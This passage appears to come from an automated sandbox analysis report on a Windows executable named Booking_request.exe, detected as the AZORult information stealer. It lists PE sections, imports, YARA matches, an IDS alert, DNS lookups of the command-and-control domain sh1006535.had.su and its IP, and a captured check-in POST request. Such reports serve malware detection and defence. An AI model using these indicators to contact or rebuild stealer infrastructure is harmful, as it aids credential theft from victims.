                                .data0x5e0000x21a80x1000False0.212646484375ump; data3.229547095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x610000xa6c70xa800False0.0521995907738ump; data2.83288306169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x6c0000x26400x2800False0.7126953125ump; data6.49255813867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                .rr0x6f0000x1110000x110a00False0.999912239225ump; Applesoft BASIC program data7.9997801217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                AFX_DIALOG_LAYOUT0x611ac0x2ump; dataRussianRussia
                                RT_ICON0x611b00x94a8ump; data
                                RT_DIALOG0x6a6580x114ump; dataRussianRussia
                                RT_GROUP_ICON0x6a76c0x14ump; MS Windows icon resource - 1 icon
                                RT_MANIFEST0x6a7800xf47ump; XML document textEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllGetCommandLineW, GetCurrentProcess, GetSystemDefaultUILanguage, GetThreadLocale, GetUserDefaultUILanguage, GetCurrentThreadId, GetSystemDefaultLangID, GetACP, GetCommandLineA, GetLastError, GetThreadUILanguage, GetCurrentThread, SwitchToThread, GetCurrentProcessorNumber, GetErrorMode, GetCurrentProcessId, GetProcessHeap, GetTickCount, GetEnvironmentStringsW, VirtualAlloc, HeapAlloc, WriteFile, CreateFileW, CloseHandle, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RaiseException, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, HeapFree, GetFileType, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, WriteConsoleW
                                USER32.dllGetActiveWindow, GetFocus, GetDialogBaseUnits, GetMessageTime, GetDesktopWindow, GetForegroundWindow, GetShellWindow
                                SHELL32.dllShellExecuteA

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                RussianRussia
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                02/24/20-11:06:12.243955TCP2029466ET TROJAN Win32/AZORult V3.3 Client Checkin M134984380192.168.2.345.147.197.20

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Feb 24, 2020 11:06:12.206954002 CET4984380192.168.2.345.147.197.20
                                Feb 24, 2020 11:06:12.242808104 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.243091106 CET4984380192.168.2.345.147.197.20
                                Feb 24, 2020 11:06:12.243954897 CET4984380192.168.2.345.147.197.20
                                Feb 24, 2020 11:06:12.279860973 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.282928944 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.283068895 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.283102036 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.283113003 CET804984345.147.197.20192.168.2.3
                                Feb 24, 2020 11:06:12.283130884 CET4984380192.168.2.345.147.197.20
                                Feb 24, 2020 11:06:12.285011053 CET4984380192.168.2.345.147.197.20
                                Feb 24, 2020 11:06:13.328694105 CET4984380192.168.2.345.147.197.20

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Feb 24, 2020 11:05:36.468585968 CET5679653192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:36.517055988 CET53567968.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:39.736383915 CET5342553192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:39.778206110 CET53534258.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:39.952039957 CET6215353192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:39.985680103 CET53621538.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:40.759938955 CET6484853192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:40.793720007 CET53648488.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:41.767611027 CET5236853192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:41.792915106 CET53523688.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:41.825467110 CET5516153192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:41.876779079 CET53551618.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:42.724617004 CET6126353192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:42.749861002 CET53612638.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:45.785841942 CET5741153192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:45.942719936 CET53574118.8.8.8192.168.2.3
                                Feb 24, 2020 11:05:49.947978020 CET5827253192.168.2.38.8.8.8
                                Feb 24, 2020 11:05:49.973356009 CET53582728.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:12.153839111 CET4990753192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:12.187583923 CET53499078.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:18.063348055 CET5362553192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:18.088736057 CET53536258.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:18.763938904 CET5332753192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:18.789227009 CET53533278.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:18.839534044 CET5527953192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:18.864876032 CET53552798.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:23.164398909 CET6277853192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:23.189733028 CET53627788.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:34.412707090 CET5142053192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:34.457128048 CET53514208.8.8.8192.168.2.3
                                Feb 24, 2020 11:06:35.711301088 CET6384453192.168.2.38.8.8.8
                                Feb 24, 2020 11:06:35.746351004 CET53638448.8.8.8192.168.2.3
                                Feb 24, 2020 11:07:01.139295101 CET6160553192.168.2.38.8.8.8
                                Feb 24, 2020 11:07:01.164657116 CET53616058.8.8.8192.168.2.3
                                Feb 24, 2020 11:07:01.789745092 CET5059453192.168.2.38.8.8.8
                                Feb 24, 2020 11:07:01.833506107 CET53505948.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Feb 24, 2020 11:06:12.153839111 CET192.168.2.38.8.8.80x1bb6Standard query (0)sh1006535.had.suA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Feb 24, 2020 11:06:12.187583923 CET8.8.8.8192.168.2.30x1bb6No error (0)sh1006535.had.su45.147.197.20A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • sh1006535.had.su

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.34984345.147.197.2080C:\Windows\SysWOW64\svchost.exe
                                TimestampkBytes transferredDirectionData
                                Feb 24, 2020 11:06:12.243954897 CET193OUTPOST /index.php HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                Host: sh1006535.had.su
                                Content-Length: 105
                                Cache-Control: no-cache
                                Data Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec
                                Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
                                Feb 24, 2020 11:06:12.282928944 CET194INHTTP/1.1 403 Forbidden
                                Server: ngjit
                                Connection: keep-alive
                                Keep-Alive: timeout=60
                                Set-Cookie: __ddg1=MYXn5XsuOzWLl2hoUqNt; Domain=.had.su; HttpOnly; Path=/; Expires=Tue, 23-Feb-2021 10:06:12 GMT
                                Date: Mon, 24 Feb 2020 10:06:12 GMT
                                Content-Type: text/html
                                Content-Length: 3835
                                ETag: "5d7f691c-efb"
                                Feb 24, 2020 11:06:12.283068895 CET195INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 64 69 73 61 62 6c 65 64 20 62 79 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 3c 2f 74
                                Data Ascii: <!DOCTYPE html><html><head> <title>Account disabled by server administrator</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style> body { font-weight: normal; font-size: 11px; font-fam
                                Feb 24, 2020 11:06:12.283102036 CET197INData Raw: 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30
                                Data Ascii: width: 14px; height: 14px; border-radius: 14px; margin: 0 auto; margin-top: 0px; } .fatal-error-message { font-size: 12px; overflow: hidden; padding: 0 10px; color: #fff; }
                                Feb 24, 2020 11:06:12.283113003 CET198INData Raw: d1 8e d1 87 d0 b5 d0 bd 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 d0 be d0 bc 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b0 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20
                                Data Ascii: .</div> </div> </div> </div> <div class="b-copyright"> <a class="b-copyright__link" href="http://ispsystem.com/external/ispmanager.html" target="_blank">ISPsyste


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:11:05:42
                                Start date:24/02/2020
                                Path:C:\Users\user\Desktop\Booking_request.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Booking_request.exe'
                                Imagebase:0x940000
                                File size:1569992 bytes
                                MD5 hash:FF17014CBB249E173309A9E1251E4574
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:11:06:10
                                Start date:24/02/2020
                                Path:C:\Windows\SysWOW64\svchost.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\svchost.exe
                                Imagebase:0x290000
                                File size:44520 bytes
                                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                Reputation:low

                                Disassembly

                                Reset < >